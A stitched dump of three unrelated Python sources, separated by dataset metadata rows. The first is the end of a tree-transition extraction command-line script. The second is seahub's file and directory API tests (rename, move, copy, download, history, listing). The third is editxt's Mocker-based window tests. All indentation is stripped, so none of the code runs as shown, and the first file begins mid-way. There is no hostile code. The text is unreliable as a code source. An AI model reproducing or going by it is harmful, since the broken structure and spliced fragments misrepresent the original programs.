class UsageAction(argparse.Action):
"""Custom action which shows extended help on available options.
"""
def __call__(self, parser, namespace, values, option_string=None):
title_str = misc.bold("{} help".format(sys.argv[0]))
help_str = "\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}".\
format(misc.make_headline("available transition types:"), misc.get_doc_opts(TRANSTYPES),
misc.make_headline("available tree input formats:"), misc.get_doc(treeinput.INPUT_FORMATS),
misc.make_headline("available tree input opts:"), misc.get_doc_opts(treeinput.INPUT_OPTIONS),
misc.make_headline("available output formats:"), misc.get_doc(transitionoutput.FORMATS),
misc.make_headline("available output opts:"), misc.get_doc_opts(transitionoutput.FORMAT_OPTIONS))
print("\n%s%s" % (title_str, help_str))
sys.exit()
def run(args):
"""Run the transition extraction.
"""
print("reading from '%s' in format '%s' and encoding '%s'"
% (args.src, args.src_format, args.src_enc), file=sys.stderr)
tree_inputformats = [fun.__name__ for fun in treeinput.INPUT_FORMATS]
transitions = []
if args.src_format in tree_inputformats:
print("extracting transitions (%s)" % args.transtype, file=sys.stderr)
cnt = 1
for tree in getattr(treeinput,
args.src_format)(args.src, args.src_enc,
**misc.options_dict
(args.src_opts)):
for algorithm in args.transform:
print(algorithm)
tree = getattr(transform, algorithm)(
tree, **misc.options_dict(args.transformparams))
sentence, trans = globals()[args.transtype](tree)
transitions.append((sentence, trans))
if cnt % 100 == 0:
print("\r%d" % cnt, end="", file=sys.stderr)
cnt += 1
else:
raise ValueError("Specify input format %s" % args.src_format)
print("\n", file=sys.stderr)
sys.stderr.write("\nwriting transitions in format '%s', encoding '%s', to '%s'"
% (args.dest_format, args.dest_enc, args.dest))
sys.stderr.write("\n")
getattr(transitionoutput, args.dest_format)(transitions, args.dest, args.dest_enc,
**misc.options_dict(args.dest_opts))
print("\n", file=sys.stderr)
sys.exit()
TRANSTYPES = {'topdown': 'Top-down continuous',
'inorder': 'Inorder continuous',
'gap': 'Gap discontinuous'}
| gpl-3.0 | -8,439,954,189,976,804,000 | 41.410256 | 113 | 0.531036 | false | 4.279431 | false | false | false |
saukrIppl/seahub | tests/api/test_files.py | 1 | 12451 | #coding: UTF-8
"""
Test file/dir operations.
"""
import posixpath
import pytest
import urllib
from urllib import urlencode, quote
import urlparse
from tests.common.utils import randstring, urljoin
from tests.api.apitestbase import ApiTestBase
class FilesApiTest(ApiTestBase):
def test_rename_file(self):
with self.get_tmp_repo() as repo:
name, furl = self.create_file(repo)
data = {
'operation': 'rename',
'newname': name + randstring(),
}
res = self.post(furl, data=data)
self.assertRegexpMatches(res.text, r'"http(.*)"')
def test_remove_file(self):
with self.get_tmp_repo() as repo:
_, furl = self.create_file(repo)
res = self.delete(furl)
self.assertEqual(res.text, '"success"')
def test_move_file(self):
with self.get_tmp_repo() as repo:
_, furl = self.create_file(repo)
# TODO: create another repo here, and use it as dst_repo
data = {
'operation': 'move',
'dst_repo': repo.repo_id,
'dst_dir': '/',
}
res = self.post(furl, data=data)
self.assertEqual(res.text, '"success"')
def test_copy_file(self):
with self.get_tmp_repo() as repo:
# TODO: create another repo here, and use it as dst_repo
# create sub folder(dpath)
dpath, _ = self.create_dir(repo)
# create tmp file in sub folder(dpath)
tmp_file = 'tmp_file.txt'
file_path = dpath + '/' + tmp_file
furl = repo.get_filepath_url(file_path)
data = {'operation': 'create'}
res = self.post(furl, data=data, expected=201)
# copy tmp file from sub folder(dpath) to dst dir('/')
data = {
'dst_repo': repo.repo_id,
'dst_dir': '/',
'operation': 'copy',
}
u = urlparse.urlparse(furl)
parsed_furl = urlparse.urlunparse((u.scheme, u.netloc, u.path, '', '', ''))
res = self.post(parsed_furl+ '?p=' + quote(file_path), data=data)
self.assertEqual(res.text, '"success"')
# get info of copied file in dst dir('/')
fdurl = repo.file_url + u'detail/?p=/%s' % quote(tmp_file)
detail = self.get(fdurl).json()
self.assertIsNotNone(detail)
self.assertIsNotNone(detail['id'])
def test_download_file(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
res = self.get(furl)
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
def test_download_file_without_reuse_token(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
res = self.get(furl)
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
# download for the first time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
# download for the second time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 400)
def test_download_file_with_reuse_token(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
res = self.get(furl + '&reuse=1')
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
# download for the first time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
# download for the second time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
def test_download_file_from_history(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
file_history_url = urljoin(repo.repo_url, 'history/') + \
'?p=/%s' % quote(fname)
res = self.get(file_history_url).json()
commit_id = res['commits'][0]['id']
self.assertEqual(len(commit_id), 40)
data = {
'p': fname,
'commit_id': commit_id,
}
query = '?' + urlencode(data)
res = self.get(repo.file_url + query)
self.assertRegexpMatches(res.text, r'"http(.*)/%s"' % quote(fname))
def test_get_file_detail(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
fdurl = repo.file_url + u'detail/?p=/%s' % quote(fname)
detail = self.get(fdurl).json()
self.assertIsNotNone(detail)
self.assertIsNotNone(detail['id'])
self.assertIsNotNone(detail['mtime'])
self.assertIsNotNone(detail['type'])
self.assertIsNotNone(detail['name'])
self.assertIsNotNone(detail['size'])
def test_get_file_history(self):
with self.get_tmp_repo() as repo:
fname, _ = self.create_file(repo)
fhurl = repo.file_url + u'history/?p=%s' % quote(fname)
history = self.get(fhurl).json()
for commit in history['commits']:
self.assertIsNotNone(commit['rev_file_size'])
#self.assertIsNotNone(commit['rev_file_id']) #allow null
self.assertIsNotNone(commit['ctime'])
self.assertIsNotNone(commit['creator_name'])
self.assertIsNotNone(commit['creator'])
self.assertIsNotNone(commit['root_id'])
#self.assertIsNotNone(commit['rev_renamed_old_path']) #allow null
#self.assertIsNotNone(commit['parent_id']) #allow null
self.assertIsNotNone(commit['new_merge'])
self.assertIsNotNone(commit['repo_id'])
self.assertIsNotNone(commit['desc'])
self.assertIsNotNone(commit['id'])
self.assertIsNotNone(commit['conflict'])
#self.assertIsNotNone(commit['second_parent_id']) #allow null
def test_get_upload_link(self):
with self.get_tmp_repo() as repo:
upload_url = urljoin(repo.repo_url, 'upload-link')
res = self.get(upload_url)
self.assertRegexpMatches(res.text, r'"http(.*)/upload-api/[^/]+"')
def test_get_update_link(self):
with self.get_tmp_repo() as repo:
update_url = urljoin(repo.repo_url, 'update-link')
res = self.get(update_url)
self.assertRegexpMatches(res.text, r'"http(.*)/update-api/[^/]+"')
# def test_upload_file(self):
# # XXX: requests has problems when post a file whose name contains
# # non-ascii data
# fname = 'file-upload-test %s.txt' % randstring()
# furl = self.test_file_url + '?p=/%s' % quote(fname)
# self.delete(furl)
# upload_url = self.test_repo_url + u'upload-link/'
# res = self.get(upload_url)
# upload_api_url = re.match(r'"(.*)"', res.text).group(1)
# files = {
# 'file': (fname, 'Some lines in this file'),
# 'parent_dir': '/',
# }
# res = self.post(upload_api_url, files=files)
# self.assertRegexpMatches(res.text, r'\w{40,40}')
# def test_update_file(self):
# fname = 'file-update-test %s.txt' % randstring()
# _, furl = self.create_file(fname=fname)
# update_url = self.test_repo_url + u'update-link/'
# res = self.get(update_url)
# update_api_url = re.match(r'"(.*)"', res.text).group(1)
# files = {
# 'file': ('filename', 'Updated content of this file'),
# 'target_file': '/test_update.c'
# }
# res = self.post(update_api_url, files=files)
# self.assertRegexpMatches(res.text, r'\w{40,40}')
def test_get_upload_blocks_link(self):
with self.get_tmp_repo() as repo:
upload_blks_url = urljoin(repo.repo_url, 'upload-blks-link')
res = self.get(upload_blks_url)
self.assertRegexpMatches(res.text, r'"http(.*)/upload-blks-api/[^/]+"')
def test_get_update_blocks_link(self):
with self.get_tmp_repo() as repo:
update_blks_url = urljoin(repo.repo_url, 'update-blks-link')
res = self.get(update_blks_url)
self.assertRegexpMatches(res.text, r'"http(.*)/update-blks-api/[^/]+"')
def test_only_list_dir(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url + '?t=d').json()
self.assertHasLen(dirents, 1)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertEqual(dirent['type'], 'dir')
def test_only_list_file(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url + '?t=f').json()
self.assertHasLen(dirents, 1)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertIsNotNone(dirent['size'])
self.assertEqual(dirent['type'], 'file')
def test_list_dir_and_file(self):
with self.get_tmp_repo() as repo:
self.create_file(repo)
self.create_dir(repo)
dirents = self.get(repo.dir_url).json()
self.assertHasLen(dirents, 2)
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertIsNotNone(dirent['name'])
self.assertIn(dirent['type'], ('file', 'dir'))
if dirent['type'] == 'file':
self.assertIsNotNone(dirent['size'])
def test_list_recursive_dir(self):
with self.get_tmp_repo() as repo:
# create test dir
data = {'operation': 'mkdir'}
dir_list = ['/1/', '/1/2/', '/1/2/3/', '/4/', '/4/5/', '/6/']
for dpath in dir_list:
durl = repo.get_dirpath_url(dpath)
self.post(durl, data=data, expected=201)
# get recursive dir
dirents = self.get(repo.dir_url + '?t=d&recursive=1').json()
self.assertHasLen(dirents, len(dir_list))
for dirent in dirents:
self.assertIsNotNone(dirent['id'])
self.assertEqual(dirent['type'], 'dir')
full_path = posixpath.join(dirent['parent_dir'], dirent['name']) + '/'
self.assertIn(full_path, dir_list)
def test_remove_dir(self):
with self.get_tmp_repo() as repo:
_, durl = self.create_dir(repo)
res = self.delete(durl)
self.assertEqual(res.text, u'"success"')
self.get(durl, expected=404)
def test_download_dir(self):
with self.get_tmp_repo() as repo:
dpath, _ = self.create_dir(repo)
query = '?p=%s' % quote(dpath)
ddurl = urljoin(repo.dir_url, 'download') + query
res = self.get(ddurl)
self.assertRegexpMatches(res.text,
r'"http(.*)/files/[^/]+/%s"' % quote(dpath[1:]))
@pytest.mark.xfail
def test_create_dir_with_parents(self):
with self.get_tmp_repo() as repo:
path = u'/level1/level 2/level_3/目录4'
self.create_dir_with_parents(repo, path)
def create_dir_with_parents(self, repo, path):
data = {'operation': 'mkdir', 'create_parents': 'true'}
durl = repo.get_dirpath_url(path.encode('utf-8'))
self.post(durl, data=data, expected=201)
curpath = ''
# check the parents are created along the way
parts = path.split('/')
for i, name in enumerate(parts):
curpath += '/' + name
url = repo.get_dirpath_url(curpath.encode('utf-8'))
if i < len(parts) - 1:
assert self.get(url).json()[0]['name'] == parts[i+1]
else:
assert self.get(url).json() == []
| apache-2.0 | -1,825,122,253,764,284,400 | 39.809836 | 87 | 0.536515 | false | 3.702261 | true | false | false |
editxt/editxt | editxt/test/test_window.py | 1 | 57101 | # -*- coding: utf-8 -*-
# EditXT
# Copyright 2007-2013 Daniel Miller <[email protected]>
#
# This file is part of EditXT, a programmer's text editor for Mac OS X,
# which can be found at http://editxt.org/.
#
# EditXT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EditXT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EditXT. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import re
from collections import defaultdict
from functools import partial
import AppKit as ak
import Foundation as fn
from mocker import Mocker, ANY
from testil import eq_
import editxt.constants as const
from editxt.window import WindowController, Window
from editxt.document import DocumentController, TextDocument
from editxt.editor import Editor
from editxt.platform.kvo import proxy_target
from editxt.project import Project
from editxt.test.noseplugins import slow_skip
from editxt.util import representedObject
from editxt.test.util import (do_method_pass_through, gentest, make_dirty,
TestConfig, Regex, replattr, tempdir, test_app)
import editxt.window as mod
log = logging.getLogger(__name__)
# log.debug("""TODO test
# Window.iter_dropped_paths
# Window.iter_dropped_id_list
# """)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Window tests
# log.debug("""TODO implement
# """)
def test_WindowController__init__():
@test_app
def test(app, args):
ed = Window(app, **args)
assert len(ed.projects) == 0
assert len(ed.recent) == 0
assert ed.wc is not None
if args:
assert ed.state is args["state"]
eq_(ed.command.window, ed)
yield test, {}
yield test, {"state": "<state data>"}
def test_window_did_load():
@test_app
def test(app, state):
import editxt.platform.views as cells
from editxt.window import BUTTON_STATE_SELECTED
from editxt.util import load_image
m = Mocker()
ed = Window(app, state)
wc = ed.wc = m.mock(WindowController)
_setstate = m.method(ed._setstate)
new_project = m.method(ed.new_project)
load_image_cache = {}
_load_image = m.mock()
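        # fake loader: serve each image from a per-name cache so repeated
        # requests reuse the same mock while every lookup is still recorded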
def load_image(name):
try:
img = load_image_cache[name]
_load_image(name)
except KeyError:
img = load_image_cache[name] = m.mock()
_load_image(name) >> img
return img
wc.docsView.setRefusesFirstResponder_(True)
wc.docsView.default_menu = ed.menu
wc.docsView.registerForDraggedTypes_(
[const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType])
wc.plusButton.setRefusesFirstResponder_(True)
wc.plusButton.setImage_(load_image(const.PLUS_BUTTON_IMAGE))
wc.propsViewButton.setRefusesFirstResponder_(True)
wc.propsViewButton.setImage_(load_image(const.PROPS_DOWN_BUTTON_IMAGE))
wc.propsViewButton.setAlternateImage_(load_image(const.PROPS_UP_BUTTON_IMAGE))
_setstate(state)
if state:
ed.projects = [m.mock(Project)]
else:
new_project()
with replattr(mod, 'load_image', load_image), m:
ed.window_did_load()
eq_(len(ed.projects), (1 if state else 0))
assert ed._state is None
#assert ed.window_settings == "<settings>"
yield test, None
yield test, "<serial data>"
def test__setstate():
from itertools import count
from editxt.util import RecentItemStack
keygen = count()
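    # Item stands in for a KVO-proxied project/editor: dict-backed attribute
    # access plus a unique auto-generated id, so recent-stack pushes can be
    # verified without real model objects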
class Item(dict):
def __init__(self, **kwargs):
self["id"] = next(keygen)
self.update(kwargs)
@property
def proxy(self):
return self
@property
def _target(self):
return self
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
@test_app
def test(app, data):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.suspend_recent_updates = m.method(ed.suspend_recent_updates)
project_class = m.replace(mod, 'Project')
ed.recent = m.mock(RecentItemStack)
ws = m.property(ed, 'window_settings')
projects = []
if data:
for serial in data.get("projects", data.get("project_serials", [])):
proj = project_class(ed, serial=serial) >> Item()
projects.append(proj)
for pi, di in data.get("recent_items", []):
if pi < 1:
while len(ed.projects) <= pi:
docs = []
proj = Item(editors=docs)
projects.append(proj)
ed.projects.append(proj)
proj = ed.projects[pi]
if di == "<project>":
ed.recent.push(proj.id)
else:
                        if di < 2:
                            while len(proj.editors) <= di:
                                proj.editors.append(Item())
                            ed.recent.push(docs[di].id)
@mod.contextmanager
def focus():
yield
ed.suspend_recent_updates() >> focus()
if 'window_settings' in data:
ws.value = data['window_settings']
with m:
ed._setstate(data)
eq_(list(ed.projects), projects)
yield test, None
yield test, dict()
yield test, dict(projects=["<serial>"])
yield test, dict(project_serials=["<serial>"]) # legacy
yield test, dict(recent_items=[[0, 2], [0, 0], [0, "<project>"], [0, 1], [1, 0]])
yield test, dict(window_settings="<window_settings>")
def test_state():
@test_app
def test(app, c):
m = Mocker()
def exists(path):
return True
ed = Window(app)
ed.projects = projs = []
ed.recent = c.recent
m.property(ed, 'window_settings').value >> '<settings>'
psets = []
items = {}
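        # map each mocked item id to the [project_index, editor_index] pair
        # ("<project>" marks the project row itself) expected in recent_items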
for i, p in enumerate(c.projs):
proj = m.mock(Project)
projs.append(proj)
pserial = proj.serialize() >> ("proj_%i" % p.id)
psets.append(pserial)
# setup for recent items
proj.id >> p.id
items[p.id] = [i, "<project>"]
docs = proj.editors >> []
for j, d in enumerate(p.docs):
editor = m.mock(Editor)
docs.append(editor)
editor.id >> d
items[d] = [i, j]
rits = [items[ri] for ri in c.recent if ri in items]
data = {'window_settings': '<settings>'}
if psets:
data["projects"] = psets
if rits:
data["recent_items"] = rits
with replattr(os.path, 'exists', exists), m:
eq_(ed.state, data)
c = TestConfig(window='<settings>')
p = lambda ident, docs=(), **kw:TestConfig(id=ident, docs=docs, **kw)
yield test, c(projs=[], recent=[])
yield test, c(projs=[p(42)], recent=[42])
yield test, c(projs=[p(42, docs=[35])], recent=[35, 42])
yield test, c(projs=[p(42, docs=[-32, 35])], recent=[35, 42])
def test_discard():
from editxt.util import RecentItemStack
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
(ed.wc.selected_items << []).count(2)
ed.projects = projs = []
ed.recent = m.mock(RecentItemStack)
app = m.replace(ed, 'app')
cv = m.property(ed, "current_editor")
@mod.contextmanager
def suspend():
yield
m.method(ed.suspend_recent_updates)(True) >> suspend()
lookup = {}
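        # walk the mocked hierarchy: the item matching c.id (and, for a
        # project, each of its editors) must be dropped from recent and closed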
for p in c.hier:
proj = m.mock(Project)
proj.id >> p.id
docs = []
for d in p.docs:
dv = m.mock(Editor)
dv.id >> d.id
docs.append(dv)
if c.id in (p.id, d.id):
ed.recent.discard(d.id)
dv.project >> proj
dv.close()
else:
lookup[d.id] = dv
proj.editors >> docs
if p.id == c.id:
ed.recent.discard(p.id)
proj.close()
else:
lookup[p.id] = proj
projs.append(proj)
item = m.mock()
item.id >> c.id
with m:
ed.discard(item)
item = lambda i, **kw: TestConfig(id=i, **kw)
c = TestConfig(id=2, recent=[], hier=[ # hierarchy of items in the window
item(0, docs=[item(1), item(2), item(3)]),
item(4, docs=[item(5), item(6), item(7)]),
item(8, docs=[item(9), item(12), item(13)]),
])
yield test, c(id=42, hier=[])
yield test, c(id=42)
yield test, c
yield test, c(recent=[0, 10])
yield test, c(recent=[10, 0])
yield test, c(recent=[20, 2])
yield test, c(recent=[2, 20])
yield test, c(id=0, recent=[0, 10, 2, 1, 3, 5, 7])
def test_get_current_editor():
with test_app() as app:
ed = Window(app)
obj = object()
ed._current_editor = obj
eq_(ed.current_editor, obj)
def test_set_current_editor():
from editxt.util import RecentItemStack
@test_app
def test(app, c):
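        # covers three paths: clearing the current editor (None), re-focusing
        # an already-current view, and switching to another editor or project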
m = Mocker()
window = Window(app)
wc = window.wc = m.mock(WindowController)
insert_items = m.method(window.insert_items)
window.recent = m.mock(RecentItemStack)
find_project_with_editor = m.method(window.find_project_with_editor)
editor = (None if c.editor_class is None else m.mock(c.editor_class))
if c.editor_class is None:
assert editor is None, editor
wc.setup_current_editor(None)
wc.selected_items = []
else:
wc.is_current_view(editor.main_view >> "view") >> c.editor_is_current
if c.editor_is_current:
editor.focus()
else:
window.recent.push(editor.id >> m.mock())
setup = c.editor_class is Editor and not c.view_is_main
wc.setup_current_editor(editor) >> setup
if setup:
if c.proj_is_none:
find_project_with_editor(editor) >> None
insert_items([editor])
else:
find_project_with_editor(editor) >> m.mock(Project)
wc.selected_items >> []
wc.selected_items = [editor]
with m:
window.current_editor = editor
c = TestConfig(editor_is_current=False, editor_class=Editor)
yield test, c(editor_is_current=True)
yield test, c(editor_class=None)
for is_main in (True, False):
for no_project in (True, False):
yield test, c(view_is_main=is_main, proj_is_none=no_project)
yield test, c(editor_class=Project)
yield test, c(editor_class=Project, editor_is_current=True)
def test_selected_editor_changed():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
cv = m.property(ed, "current_editor")
sel = [m.mock() for x in range(c.numsel)]
wc.selected_items >> sel
if sel:
if c.is_current_selected:
cv.value >> sel[0]
else:
cv.value >> m.mock()
cv.value = sel[0]
with m:
ed.selected_editor_changed()
c = TestConfig(numsel=0)
yield test, c
for ics in (True, False):
yield test, c(numsel=1, is_current_selected=ics)
yield test, c(numsel=5, is_current_selected=ics)
def test_on_dirty_status_changed():
calls = []
def callback(editor, dirty):
calls.append(dirty)
with test_app("editor") as app:
window = app.windows[0]
editor = window.projects[0].editors[0]
with replattr(window.wc, "on_dirty_status_changed", callback, sigcheck=False):
eq_(calls, [])
make_dirty(editor.document)
eq_(calls, [True])
assert window.is_dirty
editor.undo_manager.savepoint()
eq_(calls, [True, False])
assert not window.is_dirty
def test_suspend_recent_updates():
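    # config strings use the test_app layout DSL: e.g. "editor(1)* editor(2)"
    # builds a window/project holding two editors, with "*" marking current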
def test(c):
with test_app(c.init) as app:
window = app.windows[0]
editor = window.current_editor
real = window.recent
assert real is not None
with window.suspend_recent_updates():
assert window.recent is not real
window.recent.push(editor.id + 42)
if c.remove:
item = test_app(app).get(c.remove)
if isinstance(item, Editor):
item.project.editors.remove(item)
else:
item.window.projects.remove(item)
eq_(test_app(app).state, c.final)
c = TestConfig(remove=None)
yield test, c(init="editor*", final="window project editor*")
yield test, c(init="editor(1)* editor(2)",
final="window project editor(1)* editor(2)")
yield test, c(init="editor(1)* editor(2)", remove="editor(1)",
final="window project editor(2)*")
yield test, c(init="editor(1)* editor(2)", remove="editor(2)",
final="window project editor(1)*")
yield test, c(init="project(a) editor(1)* project(b) editor(2)",
final="window project(b) editor(2)*", remove="project(a)")
def test_open_documents():
def test(cfg, prompt, after):
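        # wc.prompts records each simulated open dialog as "open <directory>";
        # a "/cancel" directory makes the fake dialog cancel instead of opening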
with test_app(cfg) as app:
window = app.windows[0]
window.open_documents()
eq_(window.wc.prompts, prompt)
eq_(test_app(app).state, "window project" + after)
yield test, "window", ["open ~"], "[0] editor[~/file.txt 1]*"
yield test, "project*", ["open ~"], " editor[~/file.txt 0]*"
yield test, "project* editor", ["open ~"], " editor editor[~/file.txt 0]*"
yield test, "project editor*", ["open ~"], " editor editor[~/file.txt 0]*"
yield test, "editor(/dir/doc.txt)*", ["open /dir"], " editor(/dir/doc.txt) editor[/dir/file.txt 0]*"
yield test, "editor(/cancel/doc.txt)*", ["open /cancel"], " editor(/cancel/doc.txt)*"
def test_save_methods():
def test(cfg, save, prompt=False):
with test_app(cfg) as app:
m = Mocker()
window = app.windows[0]
current = window.current_editor
if save is not None:
method = m.method(current.save)
if save:
method(prompt=prompt)
with m:
(window.save_as if prompt else window.save)()
yield test, "window", None
yield test, "project*", False
yield test, "project* editor", False
yield test, "editor*", True
yield test, "editor*", True, True
def test_reload_current_document():
def test(cfg, reverted=False):
with test_app(cfg) as app:
m = Mocker()
window = app.windows[0]
current = window.current_editor
if reverted:
m.method(current.document.reload_document)()
else:
assert getattr(current, "document", None) is None, repr(current)
with m:
window.reload_current_document()
yield test, "window"
yield test, "project*"
yield test, "project* editor"
yield test, "project editor*", True
def test_save_document_as():
assert hasattr(Window, "save_document_as")
def test_prompt_to_overwrite():
assert hasattr(Window, "prompt_to_overwrite")
def test__directory_and_filename():
def test(path, directory, name, mkdir=False):
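        # absolute paths are re-rooted under a tempdir so the branches that
        # touch the filesystem can run hermetically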
if os.path.isabs(path):
path = path.lstrip(os.path.sep)
assert not os.path.isabs(path), path
with tempdir() as tmp:
path = os.path.join(tmp, path)
if mkdir:
assert not os.path.exists(os.path.dirname(path)), path
os.mkdir(os.path.dirname(path))
result = Window._directory_and_filename(path)
result = (result[0][len(tmp):] or "/"), result[1]
else:
result = Window._directory_and_filename(path)
eq_(result, (directory, name))
yield test, "file.txt", None, "file.txt"
yield test, "/file.txt", "/", "file.txt"
yield test, "somedir/file.txt", None, "file.txt"
yield test, "/somedir/file.txt", "/", "file.txt"
yield test, "/somedir/file.txt", "/somedir", "file.txt", True
def test_new_project():
with test_app() as app:
m = Mocker()
ed = Window(app)
m.property(ed, "current_editor").value = ANY
m.method(Project.create_editor)() >> m.mock()
with m:
result = ed.new_project()
assert result in ed.projects, ed.projects
eq_(list(result.editors), [])
eq_(result.window, ed)
def test_toggle_properties_pane():
slow_skip()
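    # scripts the NSViewAnimation frame math expected when the properties
    # pane is shown, hidden, or toggled while a resize is in progress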
@test_app
def test(app, c):
m = Mocker()
nsanim = m.replace(ak, 'NSViewAnimation')
nsdict = m.replace(fn, 'NSDictionary')
nsval = m.replace(fn, 'NSValue')
nsarr = m.replace(fn, 'NSArray')
ed = Window(app)
ed.wc = wc = m.mock(WindowController)
        tree_view = m.mock(ak.NSScrollView)
        (wc.docsScrollview << tree_view).count(2)
        prop_view = m.mock(ak.NSView)
        (wc.propsView << prop_view).count(2, 3)
tree_rect = tree_view.frame() >> m.mock(fn.NSRect)
prop_rect = prop_view.frame() >> m.mock(fn.NSRect)
wc.propsViewButton.state() >> (ak.NSOnState if c.is_on else ak.NSOffState)
if c.is_on:
prop_rect.size.height >> 10
tree_rect.size.height = (tree_rect.size.height >> 20) + 9
tree_rect.origin.y = prop_rect.origin.y >> 4
prop_rect.size.height = 0.0
else:
tree_rect.size.height = (tree_rect.size.height >> 216.0) - 115.0
if c.mid_resize:
(prop_rect.size.height << 100.0).count(2)
tree_rect.size.height = (tree_rect.size.height >> 100.0) + 99.0
else:
prop_rect.size.height >> 0
tree_rect.origin.y = (prop_rect.origin.y >> 0) + 115.0
prop_rect.size.height = 116.0
prop_view.setHidden_(False)
resize_tree = nsdict.dictionaryWithObjectsAndKeys_(
tree_view, ak.NSViewAnimationTargetKey,
(nsval.valueWithRect_(tree_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey,
None,
) >> m.mock(fn.NSDictionary)
resize_props = nsdict.dictionaryWithObjectsAndKeys_(
prop_view, ak.NSViewAnimationTargetKey,
(nsval.valueWithRect_(prop_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey,
None,
) >> m.mock(fn.NSDictionary)
anims = nsarr.arrayWithObjects_(resize_tree, resize_props, None) >> m.mock(fn.NSArray)
anim = nsanim.alloc() >> m.mock(ak.NSViewAnimation)
anim.initWithViewAnimations_(anims) >> anim
anim.setDuration_(0.25)
anim.startAnimation()
with m:
ed.toggle_properties_pane()
c = TestConfig()
yield test, c(is_on=True)
yield test, c(is_on=False, mid_resize=True)
yield test, c(is_on=False, mid_resize=False)
def test_find_project_with_editor():
with test_app() as app:
ed = Window(app)
doc = app.document_with_path(None)
proj = Project(ed)
dv = Editor(proj, document=doc)
proj.insert_items([dv])
assert dv.document is doc
ed.projects.append(proj)
eq_(ed.find_project_with_editor(dv), proj)
dv = object()
eq_(ed.find_project_with_editor(dv), None)
def test_find_project_with_path():
@test_app
def test(app, c):
m = Mocker()
def exists(path):
return True
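        # stub samefile so only an exact string match counts as the same file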
def samefile(f1, f2):
eq_(f2, c.path)
return f1 == f2
ed = Window(app)
ed.projects = projects = []
found_proj = None
for path in c.paths:
proj = m.mock(Project)
projects.append(proj)
if found_proj is None:
proj.file_path >> path
if path is None:
continue
if path == c.path:
found_proj = proj
with replattr(
(os.path, 'exists', exists),
(os.path, 'samefile', samefile),
), m:
result = ed.find_project_with_path(c.path)
eq_(result, found_proj)
def path(i):
return "/path/to/proj_%s.%s" % (i, const.PROJECT_EXT)
c = TestConfig(path=path(1), paths=[])
yield test, c
yield test, c(paths=[None])
yield test, c(paths=[path(1)])
yield test, c(paths=[path(0), path(1)])
yield test, c(paths=[path(0), path(1), path(2), path(1)])
def test_get_current_project():
def test(cfg, index, create=False, after=None):
args = {"create": True} if create else {}
with test_app(cfg) as app:
window = app.windows[0]
result = window.get_current_project(**args)
eq_(test_app(app).state, after or cfg)
if index is None:
eq_(result, None)
else:
eq_(result, window.projects[index])
yield test, "window", None
yield test, "window", 0, True, "window project[0]"
yield test, "window project", 0
yield test, "window project* project", 0
yield test, "window project project*", 1
yield test, "window project -project*", 1
yield test, "window project project editor*", 1
yield test, "window project editor project editor", 0
yield test, "window -project editor project editor", 1
def test_Window_iter_editors_of_document():
DOC = "the document we're looking for"
@test_app
def test(app, config, total_editors):
ed = Window(app)
m = Mocker()
editors = []
doc = m.mock(TextDocument)
ed.projects = projs = []
for proj_has_editor in config:
proj = m.mock(Project)
projs.append(proj)
dv = (m.mock(Editor) if proj_has_editor else None)
proj.iter_editors_of_document(doc) >> ([] if dv is None else [dv])
if dv is not None:
editors.append(dv)
with m:
result = list(ed.iter_editors_of_document(doc))
eq_(result, editors)
eq_(len(result), total_editors)
yield test, [], 0
yield test, [False], 0
yield test, [True], 1
yield test, [False, True, True, False, True], 3
def test_tool_tip_for_item():
def test(doctype, null_path):
m = Mocker()
view = m.mock(ak.NSOutlineView)
if doctype is not None:
tip = "test_tip"
doc = m.mock(doctype)
(doc.file_path << (None if null_path else tip)).count(1, 2)
else:
tip = doc = None
item = m.mock()
view.realItemForOpaqueItem_(item) >> doc
with m, test_app() as app:
ed = Window(app)
result_tip = ed.tooltip_for_item(view, item)
eq_(result_tip, (None if null_path else tip))
for doctype in (TextDocument, Project, None):
yield test, doctype, True
yield test, doctype, False
def test_should_edit_item():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
item = m.mock()
col = m.mock(ak.NSTableColumn)
if (col.isEditable() >> c.col_is_editable):
obj = m.mock(Project if c.item_is_project else Editor)
if c.item_is_project:
obj.can_rename() >> c.can_rename
representedObject(item) >> obj
with m:
result = ed.should_edit_item(col, item)
eq_(result, c.result)
